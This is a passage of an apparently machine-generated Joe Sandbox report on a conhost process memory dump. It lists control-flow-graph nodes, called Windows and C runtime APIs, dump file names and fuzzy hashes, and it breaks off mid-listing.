7ff6b1a2246f-7ff6b1a224b8 memset wcscpy wcslen 239->252 244->245 248 7ff6b1a22a2a-7ff6b1a22a49 245->248 249 7ff6b1a22a4e-7ff6b1a22a5e wcsncmp 245->249 248->249 249->225 250 7ff6b1a22a64-7ff6b1a22a87 249->250 250->215 253 7ff6b1a22a8d-7ff6b1a22af2 call 7ff6b1a23d8a 250->253 254 7ff6b1a2292e-7ff6b1a22936 251->254 255 7ff6b1a224be-7ff6b1a224ee memset wcscpy wcslen 251->255 252->254 252->255 253->217 260 7ff6b1a22af8-7ff6b1a22b04 253->260 256 7ff6b1a224f2-7ff6b1a228c4 wcslen * 3 call 7ff6b1a23d54 * 2 call 7ff6b1a23d99 call 7ff6b1a23d6f * 2 254->256 255->256 260->217
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: wcslen$memset$wcscpy$wcsncmp
                                                                                                              • String ID: 0$X$`
                                                                                                              • API String ID: 4021896446-2527496196
                                                                                                              • Opcode ID: 5cd01102cff8f793995f13fd71a6889b2a0afbefe029d4eb782a07d94de8c6f9
                                                                                                              • Instruction ID: b72491305bca5a9f2a43d92611cd77195694a40e07cf1e52b5b512131f90b096
                                                                                                              • Opcode Fuzzy Hash: 5cd01102cff8f793995f13fd71a6889b2a0afbefe029d4eb782a07d94de8c6f9
                                                                                                              • Instruction Fuzzy Hash: 2F127622608BC195E7619F2AE4403AA73A1FB95798F005326DF9C97BD9DF7CE184CB40

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 270 7ff6b1a21180-7ff6b1a211ae 271 7ff6b1a21480-7ff6b1a21483 GetStartupInfoW 270->271 272 7ff6b1a211b4-7ff6b1a211d1 270->272 274 7ff6b1a21490-7ff6b1a214aa call 7ff6b1a2a5c8 271->274 273 7ff6b1a211e4-7ff6b1a211ef 272->273 275 7ff6b1a211f1-7ff6b1a211ff 273->275 276 7ff6b1a211d3-7ff6b1a211d6 273->276 280 7ff6b1a21437-7ff6b1a21446 call 7ff6b1a2a5b8 275->280 281 7ff6b1a21205-7ff6b1a21209 275->281 278 7ff6b1a211dc-7ff6b1a211e1 Sleep 276->278 279 7ff6b1a21420-7ff6b1a21431 276->279 278->273 279->280 279->281 288 7ff6b1a2144c-7ff6b1a21467 _initterm 280->288 289 7ff6b1a21224-7ff6b1a21226 280->289 284 7ff6b1a2120f-7ff6b1a2121e 281->284 285 7ff6b1a214b0-7ff6b1a214c9 call 7ff6b1a2a5d8 281->285 284->288 284->289 296 7ff6b1a214ce-7ff6b1a214d6 call 7ff6b1a2a608 285->296 290 7ff6b1a2146d-7ff6b1a21472 288->290 291 7ff6b1a2122c-7ff6b1a21239 288->291 289->290 289->291 290->291 293 7ff6b1a21247-7ff6b1a2128f call 7ff6b1a24330 SetUnhandledExceptionFilter call 7ff6b1a2a1b0 call 7ff6b1a240b0 call 7ff6b1a2a170 291->293 294 7ff6b1a2123b-7ff6b1a21243 291->294 306 7ff6b1a212a6-7ff6b1a212ad 293->306 307 7ff6b1a21291 293->307 294->293 308 7ff6b1a212af-7ff6b1a212be 306->308 309 7ff6b1a21293-7ff6b1a21296 306->309 310 7ff6b1a212e7-7ff6b1a212ed 307->310 311 7ff6b1a212a2 308->311 314 7ff6b1a21298-7ff6b1a2129b 309->314 315 7ff6b1a212c0-7ff6b1a212c7 309->315 312 7ff6b1a21390-7ff6b1a2139a 310->312 313 7ff6b1a212f3-7ff6b1a21318 malloc 310->313 311->306 316 7ff6b1a2139c 312->316 317 7ff6b1a213a1-7ff6b1a213a7 312->317 320 7ff6b1a2131e-7ff6b1a2132c 313->320 321 7ff6b1a213b5-7ff6b1a213e9 call 7ff6b1a23ec0 call 7ff6b1a21560 313->321 314->315 322 7ff6b1a2129d 314->322 318 7ff6b1a212c9 315->318 319 7ff6b1a212e0 315->319 316->317 317->313 323 7ff6b1a212d0-7ff6b1a212de 318->323 319->310 325 7ff6b1a2132e 320->325 326 7ff6b1a21383-7ff6b1a21388 320->326 334 7ff6b1a213ee-7ff6b1a213fc 321->334 322->311 323->319 323->323 329 7ff6b1a21330-7ff6b1a21336 325->329 327 7ff6b1a21351-7ff6b1a21374 malloc memcpy 326->327 332 7ff6b1a21376-7ff6b1a21381 327->332 333 7ff6b1a213b0 327->333 331 7ff6b1a21340-7ff6b1a2134b 329->331 331->331 335 7ff6b1a2134d 331->335 332->326 332->329 333->321 334->296 336 7ff6b1a21402-7ff6b1a2140a 334->336 335->327 336->274 337 7ff6b1a21410-7ff6b1a2141f 336->337
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 772431862-0
                                                                                                              • Opcode ID: 5273d82de4d1551e83d21f6535d4e448e789cf215e6265690160c5270fcc7279
                                                                                                              • Instruction ID: 027e0672e52042b1c3fb90cbef8a8905b386124d58ed86b94028688f962d64a7
                                                                                                              • Opcode Fuzzy Hash: 5273d82de4d1551e83d21f6535d4e448e789cf215e6265690160c5270fcc7279
                                                                                                              • Instruction Fuzzy Hash: 15914676E08646E5EB609B1AE8507792BA1BF45B98F848437DB0DC7795DF3CB8818380

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 338 7ff6b1a22bf0-7ff6b1a22c59 memset call 7ff6b1a25420 * 2 343 7ff6b1a22c5b-7ff6b1a22c80 call 7ff6b1a24b60 338->343 344 7ff6b1a22c85-7ff6b1a22c89 338->344 343->344 346 7ff6b1a22c8b-7ff6b1a22c9c 344->346 347 7ff6b1a22ca3-7ff6b1a22cec call 7ff6b1a231d0 call 7ff6b1a23420 memcpy call 7ff6b1a25420 344->347 346->347 354 7ff6b1a22d90-7ff6b1a22dc7 call 7ff6b1a25420 memcpy call 7ff6b1a24b60 347->354 355 7ff6b1a22cf2-7ff6b1a22cf7 call 7ff6b1a25420 347->355 361 7ff6b1a22cfa-7ff6b1a22d01 354->361 355->361 363 7ff6b1a22d03-7ff6b1a22d0f 361->363 364 7ff6b1a22d35-7ff6b1a22d65 call 7ff6b1a22b30 call 7ff6b1a23680 call 7ff6b1a23940 361->364 365 7ff6b1a22d10-7ff6b1a22d2c 363->365 372 7ff6b1a22d6a-7ff6b1a22d6f 364->372 365->365 367 7ff6b1a22d2e 365->367 367->364 373 7ff6b1a22d7b-7ff6b1a22d8a 372->373 374 7ff6b1a22d71-7ff6b1a22d79 372->374 374->373 375 7ff6b1a22dcc-7ff6b1a22e0e call 7ff6b1a25420 * 2 374->375 380 7ff6b1a22e3b-7ff6b1a22e3f 375->380 381 7ff6b1a22e10-7ff6b1a22e36 call 7ff6b1a24b60 375->381 383 7ff6b1a22e5f-7ff6b1a22e6d wcsstr 380->383 384 7ff6b1a22e41-7ff6b1a22e59 380->384 381->380 385 7ff6b1a22e6f-7ff6b1a22e83 383->385 386 7ff6b1a22e84-7ff6b1a22ec6 call 7ff6b1a25420 * 2 383->386 384->383 391 7ff6b1a22ec8-7ff6b1a22eee call 7ff6b1a24b60 386->391 392 7ff6b1a22ef3-7ff6b1a22ef7 386->392 391->392 394 7ff6b1a22f17-7ff6b1a22f25 wcsstr 392->394 395 7ff6b1a22ef9-7ff6b1a22f11 392->395 394->385 396 7ff6b1a22f2b-7ff6b1a22f4d call 7ff6b1a25420 * 2 394->396 395->394 401 7ff6b1a22f76-7ff6b1a22f7a 396->401 402 7ff6b1a22f4f-7ff6b1a22f71 call 7ff6b1a24b60 396->402 403 7ff6b1a22f7c-7ff6b1a22f90 401->403 404 7ff6b1a22f94-7ff6b1a22fa2 wcsstr 401->404 402->401 403->404 404->385 406 7ff6b1a22fa8-7ff6b1a22fca call 7ff6b1a25420 * 2 404->406 411 7ff6b1a22fcc-7ff6b1a22fee call 7ff6b1a24b60 406->411 412 7ff6b1a22ff3-7ff6b1a22ff7 406->412 411->412 414 7ff6b1a22ff9-7ff6b1a2300d 412->414 415 7ff6b1a23011-7ff6b1a2301f wcsstr 412->415 414->415 415->385 416 7ff6b1a23025-7ff6b1a23082 call 7ff6b1a25420 * 2 415->416 421 7ff6b1a230a9-7ff6b1a230ad 416->421 422 7ff6b1a23084-7ff6b1a230a4 call 7ff6b1a24b60 416->422 424 7ff6b1a230af-7ff6b1a230b9 421->424 425 7ff6b1a230de-7ff6b1a230ef wcsstr 421->425 422->421 426 7ff6b1a230bb-7ff6b1a230d8 424->426 425->373 426->426 427 7ff6b1a230da 426->427 427->425
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpymemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 1297977491-0
                                                                                                              • Opcode ID: bc3dbd564f197475ae2ee48bd1b7872a3e2875feb24c66feb77c0a52a0e5af9c
                                                                                                              • Instruction ID: 5c4cfb08704f25a8cee10f994ae23ed9cebe567ac1f1881b70509e4caaa1482e
                                                                                                              • Opcode Fuzzy Hash: bc3dbd564f197475ae2ee48bd1b7872a3e2875feb24c66feb77c0a52a0e5af9c
                                                                                                              • Instruction Fuzzy Hash: 68D1C021A0868669FB15DB2BE4143B9A7A1AF5678CF448037DB4C87B96EF7DF044C780

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memsetwcscpywcslen
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 3616488086-4108050209
                                                                                                              • Opcode ID: 98c46a21205a8cfb2b8dcbab2e6dd1ba7cb6bdea7294c5504a002a40e778399d
                                                                                                              • Instruction ID: e484ab829349095e0c1e2504c53671821cbfb1447949c043ef434f990900c41c
                                                                                                              • Opcode Fuzzy Hash: 98c46a21205a8cfb2b8dcbab2e6dd1ba7cb6bdea7294c5504a002a40e778399d
                                                                                                              • Instruction Fuzzy Hash: 1211C42262869091E7609B26F4503ABA760EFC47A8F940332FB9C47FD5DF3DD6468780

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memsetwcscpywcslen
                                                                                                              • String ID:
                                                                                                              • API String ID: 3616488086-0
                                                                                                              • Opcode ID: 50fb7179b08112fa5563dfaff0679ef7fc5891c63ca89bd416cdf5f2948ee9db
                                                                                                              • Instruction ID: 817a8ac2613ac5f8698fe48ad9b8bc08ab06dce42d982560c54eaf802ced9362
                                                                                                              • Opcode Fuzzy Hash: 50fb7179b08112fa5563dfaff0679ef7fc5891c63ca89bd416cdf5f2948ee9db
                                                                                                              • Instruction Fuzzy Hash: B5210B2260824161E7219F1BA5003ABE650FF85798F400232EF9D47BD5DF7DF146C740

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$wcslen$wcscpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 3662116142-0
                                                                                                              • Opcode ID: 077528b4fbaf6a6988103b45e5cfefddc40e8fdd82ed91b7a98fdfc43cacc2ce
                                                                                                              • Instruction ID: e162583a151d6a3217b4022ebf9ad4f2281662719676d1863ffaa1023c3ec222
                                                                                                              • Opcode Fuzzy Hash: 077528b4fbaf6a6988103b45e5cfefddc40e8fdd82ed91b7a98fdfc43cacc2ce
                                                                                                              • Instruction Fuzzy Hash: A201C822B0864151E320EB17B9007FA6662AFC6BD4F544132FF8D53B85CE3CF1468744

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 550 7ff6b1a246f3-7ff6b1a2471b 551 7ff6b1a24721-7ff6b1a24726 550->551 552 7ff6b1a24870-7ff6b1a24874 550->552 554 7ff6b1a24728-7ff6b1a2472d 551->554 555 7ff6b1a24783-7ff6b1a24788 551->555 552->551 553 7ff6b1a2487a 552->553 556 7ff6b1a247d0 553->556 559 7ff6b1a2472f-7ff6b1a24734 554->559 560 7ff6b1a247a2-7ff6b1a247b2 signal 554->560 557 7ff6b1a2478e 555->557 558 7ff6b1a24845-7ff6b1a24855 call 7ff6b1a2a660 555->558 567 7ff6b1a247d5-7ff6b1a247da 556->567 561 7ff6b1a247e0-7ff6b1a247e5 557->561 562 7ff6b1a24790-7ff6b1a24795 557->562 563 7ff6b1a24857-7ff6b1a2485a 558->563 581 7ff6b1a24890-7ff6b1a248a4 signal 558->581 559->556 566 7ff6b1a2473a 559->566 560->563 564 7ff6b1a247b8-7ff6b1a247cc signal call 7ff6b1a240b0 560->564 561->556 575 7ff6b1a247e7-7ff6b1a247ec 561->575 562->556 568 7ff6b1a24797-7ff6b1a2479c 562->568 573 7ff6b1a2485c-7ff6b1a24868 563->573 574 7ff6b1a2482e-7ff6b1a24838 563->574 564->556 571 7ff6b1a24820-7ff6b1a24825 566->571 572 7ff6b1a24740-7ff6b1a24745 566->572 568->560 568->574 576 7ff6b1a247ee-7ff6b1a247fe signal 571->576 577 7ff6b1a24827-7ff6b1a2482c 571->577 572->556 582 7ff6b1a2474b-7ff6b1a24750 572->582 573->567 578 7ff6b1a2483a-7ff6b1a24841 574->578 579 7ff6b1a24880-7ff6b1a24887 574->579 575->574 575->576 584 7ff6b1a248a9-7ff6b1a248bb signal 576->584 585 7ff6b1a24804-7ff6b1a24807 576->585 577->556 577->574 578->558 581->567 582->574 586 7ff6b1a24756-7ff6b1a24766 signal 582->586 584->567 585->574 589 7ff6b1a24809-7ff6b1a24815 585->589 587 7ff6b1a2476c-7ff6b1a2476f 586->587 588 7ff6b1a248c0-7ff6b1a248d2 signal 586->588 587->574 590 7ff6b1a24775-7ff6b1a24781 587->590 588->567 589->567 590->567
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: signal
                                                                                                              • String ID: CCG
                                                                                                              • API String ID: 1946981877-1584390748
                                                                                                              • Opcode ID: f73b309feccdc0718c8485bc7f4582f47a7c2fa0c47dfc38db2b25948b920a74
                                                                                                              • Instruction ID: 44ba613d0f25673c903bed9f90a217fb5246398495fddcc580c1fc4c5d107323
                                                                                                              • Opcode Fuzzy Hash: f73b309feccdc0718c8485bc7f4582f47a7c2fa0c47dfc38db2b25948b920a74
                                                                                                              • Instruction Fuzzy Hash: D3416B21E2858266FBB9537F645037810899F8A73CF298637D72DC37D2DE5CF8908682

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 502 7ff6b1a25420-7ff6b1a2543c 503 7ff6b1a25458-7ff6b1a2545f 502->503 504 7ff6b1a2543e-7ff6b1a25445 502->504 506 7ff6b1a25461-7ff6b1a25489 GetLastError TlsGetValue SetLastError 503->506 507 7ff6b1a254d0-7ff6b1a254d6 503->507 505 7ff6b1a25447-7ff6b1a25453 504->505 508 7ff6b1a2548f-7ff6b1a25495 506->508 509 7ff6b1a25540-7ff6b1a2555a call 7ff6b1a2a600 506->509 510 7ff6b1a255ea-7ff6b1a255f1 507->510 511 7ff6b1a254dc-7ff6b1a254e6 507->511 514 7ff6b1a25588-7ff6b1a255af call 7ff6b1a2a658 508->514 515 7ff6b1a2549b-7ff6b1a254a7 508->515 528 7ff6b1a25560 509->528 529 7ff6b1a25673-7ff6b1a25683 abort 509->529 510->506 512 7ff6b1a255f7-7ff6b1a2560d 510->512 516 7ff6b1a25618-7ff6b1a25620 511->516 517 7ff6b1a254ec-7ff6b1a254f4 511->517 514->529 541 7ff6b1a255b5-7ff6b1a255cf memset 514->541 515->505 523 7ff6b1a254a9-7ff6b1a254b6 call 7ff6b1a25320 515->523 520 7ff6b1a255d1-7ff6b1a255d6 call 7ff6b1a253c0 516->520 521 7ff6b1a25622-7ff6b1a2563a 516->521 518 7ff6b1a254fa-7ff6b1a25501 517->518 519 7ff6b1a2564c-7ff6b1a25660 WaitForSingleObject 517->519 518->512 525 7ff6b1a25507-7ff6b1a2550b 518->525 519->518 530 7ff6b1a25666-7ff6b1a2566e 519->530 527 7ff6b1a255e0-7ff6b1a255e4 520->527 526 7ff6b1a2563c 521->526 521->527 523->505 525->506 535 7ff6b1a25511-7ff6b1a25519 525->535 536 7ff6b1a25640-7ff6b1a25648 Sleep 526->536 527->510 527->517 537 7ff6b1a25563-7ff6b1a25574 TlsSetValue 528->537 538 7ff6b1a25690-7ff6b1a25694 529->538 539 7ff6b1a25685-7ff6b1a25688 529->539 530->518 535->506 542 7ff6b1a2551f-7ff6b1a25534 ReleaseSemaphore 535->542 536->536 543 7ff6b1a2564a 536->543 537->515 544 7ff6b1a2557a-7ff6b1a2557d GetLastError 537->544 545 7ff6b1a25696 538->545 546 7ff6b1a2569a-7ff6b1a2569d 538->546 539->538 541->537 542->506 543->527 544->515 545->546 547 7ff6b1a2569f-7ff6b1a256a2 546->547 548 7ff6b1a256a4 546->548 547->548 549 7ff6b1a256a8-7ff6b1a256ac 547->549
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$Value
                                                                                                              • String ID:
                                                                                                              • API String ID: 1883355122-0
                                                                                                              • Opcode ID: 58db43fd21a0ba2d1e1cc71ca469b3e74231a5d0418b27b06489b0aceca4c8ca
                                                                                                              • Instruction ID: 5ef8ac05fc249545bc34fefc507e2be784ab69b25b3d147dd80163ac2db0073a
                                                                                                              • Opcode Fuzzy Hash: 58db43fd21a0ba2d1e1cc71ca469b3e74231a5d0418b27b06489b0aceca4c8ca
                                                                                                              • Instruction Fuzzy Hash: 1B613C31B09602A5EB659F2AA8147B962A1BF45B9DF588037CF0DC7691CF3CF846C380

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 593 7ff6b1a240c0-7ff6b1a2414c call 7ff6b1a2a1c0 call 7ff6b1a2a630 call 7ff6b1a2a1c0 call 7ff6b1a2a680 call 7ff6b1a2a5f8 605 7ff6b1a242c0-7ff6b1a242c2 593->605 606 7ff6b1a24152-7ff6b1a2415f 593->606 607 7ff6b1a24160-7ff6b1a24166 606->607 608 7ff6b1a24168-7ff6b1a24176 607->608 609 7ff6b1a2417c-7ff6b1a24185 607->609 608->609 610 7ff6b1a24205-7ff6b1a24208 608->610 609->607 611 7ff6b1a24187-7ff6b1a24195 call 7ff6b1a24fd0 609->611 613 7ff6b1a2420a-7ff6b1a2420d 610->613 614 7ff6b1a24231-7ff6b1a24243 610->614 621 7ff6b1a2419b-7ff6b1a241e4 call 7ff6b1a25110 VirtualQuery 611->621 622 7ff6b1a24312-7ff6b1a24350 call 7ff6b1a240c0 611->622 618 7ff6b1a242d0-7ff6b1a242df 613->618 619 7ff6b1a24213-7ff6b1a24215 613->619 615 7ff6b1a24226-7ff6b1a24230 614->615 616 7ff6b1a24245-7ff6b1a24248 614->616 620 7ff6b1a2424a-7ff6b1a2425a 616->620 618->615 619->615 623 7ff6b1a24217-7ff6b1a24220 619->623 620->620 625 7ff6b1a2425c-7ff6b1a24266 620->625 631 7ff6b1a241ea-7ff6b1a241f4 621->631 632 7ff6b1a242f5-7ff6b1a2430d call 7ff6b1a240c0 621->632 633 7ff6b1a24363-7ff6b1a243ba call 7ff6b1a25050 call 7ff6b1a25290 622->633 634 7ff6b1a24352-7ff6b1a24362 622->634 623->615 624 7ff6b1a242e4-7ff6b1a242f0 623->624 624->615 635 7ff6b1a241f6-7ff6b1a241fc 631->635 636 7ff6b1a241fe 631->636 632->622 633->634 645 7ff6b1a243bc-7ff6b1a243c2 633->645 635->636 638 7ff6b1a24270-7ff6b1a242a6 VirtualProtect 635->638 636->610 638->636 640 7ff6b1a242ac-7ff6b1a242bb GetLastError call 7ff6b1a240c0 638->640 640->605 646 7ff6b1a243c8-7ff6b1a243ca 645->646 647 7ff6b1a24503-7ff6b1a24505 645->647 648 7ff6b1a243d0 646->648 649 7ff6b1a24612-7ff6b1a24615 646->649 647->649 650 7ff6b1a2450b-7ff6b1a24513 647->650 652 7ff6b1a243d3-7ff6b1a243d5 648->652 649->634 651 7ff6b1a2461b-7ff6b1a24636 649->651 650->652 653 7ff6b1a24519-7ff6b1a2451c 650->653 654 7ff6b1a24640-7ff6b1a24663 call 7ff6b1a24130 651->654 652->649 655 7ff6b1a243db-7ff6b1a243e1 652->655 659 7ff6b1a24525-7ff6b1a24528 653->659 666 7ff6b1a24665 654->666 657 7ff6b1a243e7-7ff6b1a243f9 655->657 658 7ff6b1a24692-7ff6b1a246ae call 7ff6b1a240c0 655->658 661 7ff6b1a2444b-7ff6b1a24465 657->661 662 7ff6b1a243fb 657->662 678 7ff6b1a246dc-7ff6b1a246e0 658->678 679 7ff6b1a246b0-7ff6b1a246db 658->679 664 7ff6b1a2466a-7ff6b1a24679 call 7ff6b1a240c0 659->664 665 7ff6b1a2452e-7ff6b1a24553 659->665 668 7ff6b1a2446b 661->668 669 7ff6b1a245d0-7ff6b1a245f6 661->669 662->634 675 7ff6b1a2467e-7ff6b1a2468d call 7ff6b1a240c0 664->675 671 7ff6b1a24570-7ff6b1a24580 665->671 672 7ff6b1a24555-7ff6b1a24566 call 7ff6b1a24130 665->672 666->664 668->659 677 7ff6b1a24471-7ff6b1a24474 668->677 669->671 676 7ff6b1a245fc-7ff6b1a2460d call 7ff6b1a24130 669->676 674 7ff6b1a24586-7ff6b1a24594 671->674 671->675 686 7ff6b1a24442-7ff6b1a24449 672->686 674->675 681 7ff6b1a2459a-7ff6b1a2459d 674->681 675->658 684 7ff6b1a24476-7ff6b1a24479 677->684 685 7ff6b1a24400-7ff6b1a2442b 677->685 679->678 681->676 687 7ff6b1a2459f 681->687 684->664 690 7ff6b1a2447f-7ff6b1a24493 684->690 685->671 688 7ff6b1a24431-7ff6b1a2443d call 7ff6b1a24130 685->688 686->661 696 7ff6b1a244b3-7ff6b1a244bb 686->696 693 7ff6b1a245a1-7ff6b1a245a4 687->693 694 7ff6b1a245c0-7ff6b1a245c3 687->694 688->686 690->671 692 7ff6b1a24499-7ff6b1a244b1 call 7ff6b1a24130 690->692 692->661 692->696 693->688 699 7ff6b1a245aa-7ff6b1a245ad 693->699 694->686 700 7ff6b1a245c9 694->700 696->634 698 7ff6b1a244c1-7ff6b1a244ce 696->698 702 